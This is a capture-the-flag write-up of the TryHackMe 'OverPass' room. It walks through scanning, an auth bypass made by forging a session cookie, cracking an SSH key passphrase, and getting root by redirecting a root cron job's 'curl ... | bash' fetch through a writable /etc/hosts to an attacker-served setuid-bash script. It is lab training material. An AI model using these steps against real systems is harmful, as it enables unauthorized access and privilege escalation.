TryHackMe Room: https://tryhackme.com/room/overpass
New Day, New Room. Today we are attempting the OverPass room.
I boot up my AttackBox and machine, the machine in question is 10.10.224.184
.
First, I do a preliminary nmap scan:
root@ip-x-x-x-x:~# nmap -sV 10.10.224.184
Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-09 15:57 BST
Nmap scan report for ip-10-10-224-184.eu-west-1.compute.internal (10.10.224.184)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
MAC Address: 02:D2:A2:85:F6:47 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds
We can see we have a way in for SSH access on port 22, and we also have a webserver running on port 80. I browse around the website but do not really see anything too interesting. There are some downloads and source code for a password-to-file application. Next, let’s fire up gobuster to see if we have any common directories:
root@ip-x-x-x-x:~# gobuster dir --wordlist /usr/share/wordlists/dirb/common.txt -u 10.10.224.184
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://10.10.224.184
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2021/07/09 15:55:52 Starting gobuster
/aboutus (Status: 301)
/admin (Status: 301)
/css (Status: 301)
/downloads (Status: 301)
/img (Status: 301)
/index.html (Status: 301)
2021/07/09 15:55:53 Finished
The admin
directory is of interest. Let’s check that out!
We are greeted with an admin login page. I checked the source code to see if there was any comments left in the code but did not see anything. One interesting file with this webpage is the login.js
file. It shows us that the form submits to /api/login
and then will return statusOrCookie
that will be either "Incorrect credentials"
or it will a token that is set using Cookies.set("SessionToken",statusOrCookie)
. This looks like a promissing attack vector.
Another possible route may be SQL injection. I am going to test a common set of passwords like admin:password123
and see if that gives us anything, then try some SQL injection. If all else fails, I want to check to see if we can just set our own SessionToken and grant ourselves access.
SQL Injection did not work, but setting the SessionToken cookie and refreshing so it sends over the headers did work! It provides us with an SSH private key for ‘James’. Also mentions it is crackable. First I am just going to copy the contents and see if we can login with the key alone.
I copied the key to ~/.ssh/id_rsa
and did a chmod 400 ~/.ssh/id_rsa
to set permissions to read only by us, and finally ssh -i ~/.ssh/id_rsa 10.10.224.184
to attempt to login.
And crud:
Looks like we will be cracking the passphrase after all. First we need to convert the key to a hash using ssh2john.py – which I don’t know where it is so find + grep will help me out:
root@ip-x-x-x-x:/usr/bin# locate "ssh2john.py"
/opt/john/ssh2john.py
Now we just use python /opt/john/ssh2john.py ~/.ssh/id_rsa > id_rsa.hash
to get the hash file.
Next I did a locate rockyou
to find the word list and we can use the hash file with a wordlist to crack the passphrase:
root@ip-x-x-x-x:~# john id_rsa.hash /usr/share/wordlists/rockyou.txt --format=SSH
Within a few seconds we get the passphrase! Now let’s ssh back in to james’ account.
ssh -i ~/.ssh/id_rsa [email protected]
And we can cat user.txt
for the first flag!
Now we need to privesc to get root permissions.
First, I try running sudo -l
to see what commands we can run as sudo, however it immediately asks us for a password that we do not know.
I am going to grab a copy of LinEnum.sh and get it on the machine to run and see what all we have to work with:
# First, we need to get the file on our attack machine
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Next, start a web server in the dir to transfer the file
python -m "http.server" 3333
# Now, on the target machine, grab the file
wget https://attack-machine-ip:3333/LinEnum.sh
# Set executable
chmod +x LinEnum.sh
# Save the results out
./LinEnum.sh > results.txt
# and lets parse through them
cat results.txt | more
I’m parsing through the results and these items stand out:
- Two admin users of
syslog
andtryhackme
- Super user account
root
- Home directory of
tryhackme
is set to only allow that user to read from it (vs our home directory is readable by all) - The crontab executes a
curl overpass.thm/downloads/src/buildscript.sh | bash
as root every minute- This is our way in. I ran a
cat /etc/hosts
and see thatoverpass.thm
just points back to localhost, which means the file is here on the machine. - It seems like the files might be in the /root or /tryhackme folders. So we cannot get to those yet.
- This is our way in. I ran a
I went back a little and checked the perms of the hosts file with ls -la /etc/hosts
and it shows that everyone is able to read and write to hosts!! So we can create a file on our machine in the directory /downloads/src/buildscript.sh and have it do what we want. The easiest thing is to chmod +s /bin/bash
so when we run it, we get root privileges.
So that’s exactly what I did! I started a python web server with python3 -m "http.server" 80
in a directory that had the folder structure of /downloads/src/buildscript.sh. Then I modified the /etc/hosts on the target machine to point overpass.thm to my attack machine’s IP. After a minute, I saw the call come in and it grabbed the file!
Now I just needed to call /bin/bash -p
and ran whoami
and it said root
!
cat /root/root.txt
gives us the final flag.
Comments
No comments available.